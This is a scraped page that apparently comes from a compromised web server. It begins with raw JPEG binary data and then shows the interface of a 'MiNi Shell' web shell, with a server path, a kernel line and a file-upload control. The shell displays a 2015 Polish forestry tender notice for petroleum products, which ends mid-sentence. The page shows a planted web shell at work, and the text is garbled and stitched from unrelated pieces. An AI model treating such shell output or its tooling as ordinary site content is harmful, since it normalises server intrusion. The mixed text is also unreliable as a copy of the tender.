JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150619/149342-N-2015.html

<p class="kh_header"><b>Stary Sącz: SA.2710.10.2015.SF-Dostawa produktów ropopochodnych</b><br>
<b>Numer ogłoszenia: 149342 - 2015; data zamieszczenia: 19.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Stary Sącz , ul. Magazynowa 5, 33-340 Stary Sącz, woj. małopolskie, tel. 18 446 09 91, faks 18 446 09 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.starysacz.krakow.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SA.2710.10.2015.SF-Dostawa produktów ropopochodnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest dostawa produktów ropopochodnych do samochodów i sprzętu drogowego będących na stanie Zamawiającego, realizowana bezgotówkowo w formie tankowania bezpośredniego do zbiorników paliwowych samochodów i sprzętu drogowego, na stacjach paliw w odległości nie większej niż 5 km od siedziby Zamawiającego.2)	Obowiązkiem Dostawcy będzie prowadzenie ewidencji wydanego paliwa wg numerów rejestracyjnych samochodów i maszyn drogowych. W ewidencjach rejestrowane będą: ilość, data, cena brutto w dniu tankowania.3)	Zamówienie obejmuje dostawę przez okres 24 m-cy - następujących paliw:Lp	Nazwa produktu	Jedn.	Ilość jednostek
			średnio m-cznie	za 24 m-ce
1	Etylina 95	Litr	120	2880
2	Olej napędowy	Litr	1800	43200
3	Olej silnikowy superol lub równoważny	Litr	50	1200
4	Olej hydrauliczny HL-68 lub równoważny	Litr	40	960
5	Inne produkty tj. płyny eksploatacyjne, akcesoria i kosmetyki samochodowe itp. - o wartości 5% w/w. pozycji 1-4
4)	W przypadku niewykonania rzeczowego zakresu przedmiotu zamówienia od określonych powyżej ilości (tak w okresach miesięcznych jak i za 24 m-ce) uzgodnione wynagrodzenie zostanie skorygowane. Podstawą do wyliczenia kwoty należnego wynagrodzenia będą:a)	faktycznie wykonany, obustronnie uzgodniony zakres przedmiotu zamówienia,b)	ceny jednostkowe przyjęte w ofercie wykonawcy.5)	Równocześnie ustala się że pomniejszenie wynagrodzenia nie przekroczy 50 % wartości wynagrodzenia przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8, 09.21.11.00-2, 09.21.16.00-7, 09.21.16.10-0, 09.21.16.50-2, 34.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Zamawiający wymaga wniesienia wadium w wysokości 3000,00 zł (słownie: trzy tysiące złotych).2)	Wadium należy wnieść w formie określonej w art. 45 ust. 6 ustawy pzp.3)	Wadium wnoszone w formie niepieniężnej należy przekazać Zamawiającemu w formie oryginału w ofercie. Można również oryginał dokumentu złożyć w siedzibie Zamawiającego (sekretariat n-ctwa) w terminie złożenia oferty określonym w pkt. 11 niniejszej SIWZ. Kopię dokumentu należy wówczas dołączyć do oferty.4)	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). 5)	Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.6)	Wadium musi być wniesione najpóźniej do wyznaczonego terminu tj. dnia 29 czerwca 2015 roku do godziny 10:00.  7)	Wadium wnoszone w formie pieniężnej należy wnieść przelewem na rachunek bankowy zamawiającego nr: 72 2030 0045 1110 0000 0024 4510 z dopiskiem na blankiecie przelewu  wadium na: Dostawa produktów ropopochodnych 8)	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie do dnia 29 czerwca 2015 roku do godziny 10:00 znajdzie się na rachunku bankowym Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku należy przedłożyć koncesje na obrót paliwami ciekłymi.7)	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Zamawiający wymaga złożenia oświadczenia w tym zakresi7)	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.e.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Zamawiający wymaga wykazania przez Oferenta, że dysponuje on stacją paliw, umożliwiająca realizację przedmiotu zamówienia w odległości nie większej niż 5 km od siedziby Nadleśnictwa.7)	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Zamawiający wymaga złożenia oświadczenia w tym zakresie.7)	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku należy: 1.	wykazać posiadanie w banku lub spółdzielczej kasie oszczędnościowo - kredytowej środków finansowych lub zdolności kredytowej w kwocie nie mniejszej niż kwota 20 000 PLN (słownie: dwadzieścia tysięcy złotych).2.	przedłożyć dowód potwierdzający ubezpieczenie od odpowiedzialności cywilnej (dalej OC) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia, w tym od szkód wyrządzonych przez wykonawcę:a.	zamawiającemu - OC na kwotę co najmniej 100 tys. zł.;b.	pracownikom wykonawcy - OC na kwotę co najmniej 100 tys. zł.;c.	osobom trzecim - OC na kwotę co najmniej 100 tys. zł.Z treści przedłożonego dokumentu musi jednoznacznie wynikać, że wykonawca posiada ubezpieczenie OC z w/w. tytułów. W przypadku gdy na przedłożonym dokumencie (polisie) brak takiej informacji, wykonawca zobowiązany jest dołączyć do niego stosowne oświadczenie brokera ubezpieczeniowego, potwierdzające, że przedłożony dokument potwierdza posiadanie OC wykonawcy w w/w. zakresieW przypadku, gdy Wykonawca dla potwierdzenia spełnienia warunków udziału w postępowaniu przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na złoty polski. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski kurs średni waluty na dzień wystawienia przez instytucje finansową dokumentu potwierdzającego sytuację ekonomiczną i finansową.7)	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>b)	Oświadczenie o dysponowaniu odpowiednim potencjałem technicznym pozwalającym na realizację zamówienia w zakresie zgodnym z wymogami pkt. 5.6) c) SIWZ - złożone na załączniku nr 1 do SIWZ, tj.że dysponuje on stacją paliw, umożliwiająca realizację przedmiotu zamówienia w odległości nie większej niż 5 km od siedziby Nadleśnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin realizacji płatności dla wykonawcy - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Szczegółowe postanowienia zawiera wzór umowy, który jest załącznikiem nr 3 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krakow/nadl_stary_sacz/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe, 
Nadleśnictwo Stary Sącz,
33-340 Stary Sącz,
ul. Magazynowa 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2015 godzina 10:00, miejsce: Państwowe Gospodarstwo Leśne Lasy Państwowe, 
Nadleśnictwo Stary Sącz,
33-340 Stary Sącz,
ul. Magazynowa 5.Sekretariat-pokój nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> O udzielenie zamówienia może ubiegać się osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz podmioty te występujące wspólnie.2)	O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy pzp, a także pozostałe warunki określone w SIWZ oraz nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy pzp.3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia, reprezentowaniu w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty.4)	Żaden z podmiotów występujących wspólnie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy pzp.5)	O udział w postępowaniu o udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy pzp, tj:a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,b)	Posiadają wiedzę i doświadczenie,c)	Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do  wykonania zamówienia,d)	Posiadają niezbędną zdolność ekonomiczną i finansową. Spełnienie  w/w warunków:a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania w celu potwierdzenia spełnienia powyższego warunku należy przedłożyć koncesje na obrót paliwami ciekłymi.b)	Posiadają wiedzę i doświadczenie - w celu spełnienia powyższego warunku Zamawiający wymaga złożenia oświadczenia w tym zakresie. c)	Dysponowanie odpowiednim potencjałem technicznym - w celu spełnienia powyższego warunku Zamawiający wymaga wykazania przez Oferenta, że dysponuje on stacją paliw, umożliwiająca realizację przedmiotu zamówienia w odległości nie większej niż 5 km od siedziby Nadleśnictwa.d)	Dysponowanie osobami zdolnymi do wykonania zamówienia - w celu spełnienia powyższego warunku Zamawiający wymaga złożenia oświadczenia w tym zakresie.e)	Sytuacja ekonomiczna i finansowa - w celu potwierdzenia spełnienia powyższego warunku należy: 1.	wykazać posiadanie w banku lub spółdzielczej kasie oszczędnościowo - kredytowej środków finansowych lub zdolności kredytowej w kwocie nie mniejszej niż kwota 20 000 PLN (słownie: dwadzieścia tysięcy złotych).2.	przedłożyć dowód potwierdzający ubezpieczenie od odpowiedzialności cywilnej (dalej OC) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia, w tym od szkód wyrządzonych przez wykonawcę:a.	zamawiającemu - OC na kwotę co najmniej 100 tys. zł.;b.	pracownikom wykonawcy - OC na kwotę co najmniej 100 tys. zł.;c.	osobom trzecim - OC na kwotę co najmniej 100 tys. zł.Z treści przedłożonego dokumentu musi jednoznacznie wynikać, że wykonawca posiada ubezpieczenie OC z w/w. tytułów. W przypadku gdy na przedłożonym dokumencie (polisie) brak takiej informacji, wykonawca zobowiązany jest dołączyć do niego stosowne oświadczenie brokera ubezpieczeniowego, potwierdzające, że przedłożony dokument potwierdza posiadanie OC wykonawcy w w/w. zakresie.	Informacje o sposobie porozumiewania się Zamawiającego z wykonawcami oraz przekazywania oświadczeń lub dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z Wykonawcami;
1)	W niniejszym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie, faksem (018) 4460983 lub drogą elektroniczną starysacz@krakow.lasy.gov.pl.        2)	W przypadku oświadczeń, wniosków, zawiadomień lub informacji przekazywanych faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.3)	Jeżeli Zamawiający lub Wykonawca przekazuje dokumenty faxem lub drogą elektroniczną, każda ze stron na żądanie Wykonawcy drugiej niezwłocznie potwierdza fakt jego otrzymania.4)	Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie jednak nie później niż na 2 dni przed upływem terminu składania ofert - pod warunkiem, że wniosek o wyjaśnienie treści SIWZ wpłynął do Zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert.5)	Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o którym mowa w pkt. 7.4).6)	Zamawiający przekazuje treść zapytań wraz z wyjaśnieniami Wykonawcom, którym przekazał SIWZ, bez ujawniania źródła zapytania, a także zamieszcza na stronie internetowej, na której została umieszczona niniejsza specyfikacja.7)	W uzasadnionych przypadkach Zamawiający może przed upływem terminu do składania ofert, zmienić treść specyfikacji istotnych warunków zamówienia (art. 38, ust. 4 ustawy PZP). Dokonaną w ten sposób zmianę przekazuje się niezwłocznie wszystkim Wykonawcom, którym przekazano specyfikację istotnych warunków zamówienia oraz zamieszcza na stronie internetowej zamawiającego.8)	Zamawiający nie przewiduje zwołania zebrania wykonawców w celu wyjaśnienia  ewentualnych wątpliwości dotyczących specyfikacji istotnych warunków zamówienia. 9)	Osobami uprawnionymi przez zamawiającego do kontaktu z wykonawcami są:a)	w sprawach związanych z SIWZ (do momentu otwarcia ofert) oraz podpisaniem umowy:.	Stanisław Faron b)	w sprawach związanych z przetargiem - od momentu otwarcia ofert:.	Jerzy Mrówka w dniach od poniedziałku do piątku w godzinach od 800 do 1400.	1) Oferta powinna być zgodna z wzorem oferty stanowiącym załącznik nr 1 do SIWZ, sporządzona w języku polskim, ręcznie, na maszynie do pisania, komputerze lub inną trwałą i czytelną techniką oraz podpisana przez osobę upoważnioną do reprezentowania Wykonawcy i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty. W przypadku podpisania oferty przez pełnomocnika należy dołączyć stosowne pełnomocnictwo.2)	Zaleca się, aby każda zapisana strona oferty wraz z załącznikami była ponumerowana kolejnymi numerami a całość zszyta w sposób uniemożliwiający wysunięcie się stron i jej zdekompletowanie. Wszelkie poprawki lub zmiany w tekście oferty muszą być parafowane własnoręcznie przez osobę podpisującą 3)	Do oferty należy dołączyć dokumenty potwierdzające spełnianie warunków udziału w postępowaniu - wyszczególnione w pkt 6. SIWZ. 4)	Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę (w przypadku Konsorcjum przez Pełnomocnika).5)	Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów.6)	Oferta winna być złożona w dwóch zamkniętych kopertach, z których zewnętrzna winna być oznaczona nazwą i adresem Zamawiającego oraz opisana w następujący sposób: Oferta na przetarg Dostawa produktów ropopochodnych, NIE OTWIERAĆ przed 29 czerwca 2015 roku - godz. 10:15. Na wewnętrznej kopercie należy podać nazwę i adres Wykonawcy, by umożliwić zwrot nie otwartej oferty w przypadku unieważnienia postępowania przed terminem otwarcia ofert lub dostarczenia jej Zamawiającemu po terminie.7)	Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać ofertę. 8)	Wprowadzone zmiany muszą być złożone wg takich samych zasad jak złożona oferta tj. w odpowiednio oznakowanej kopercie z 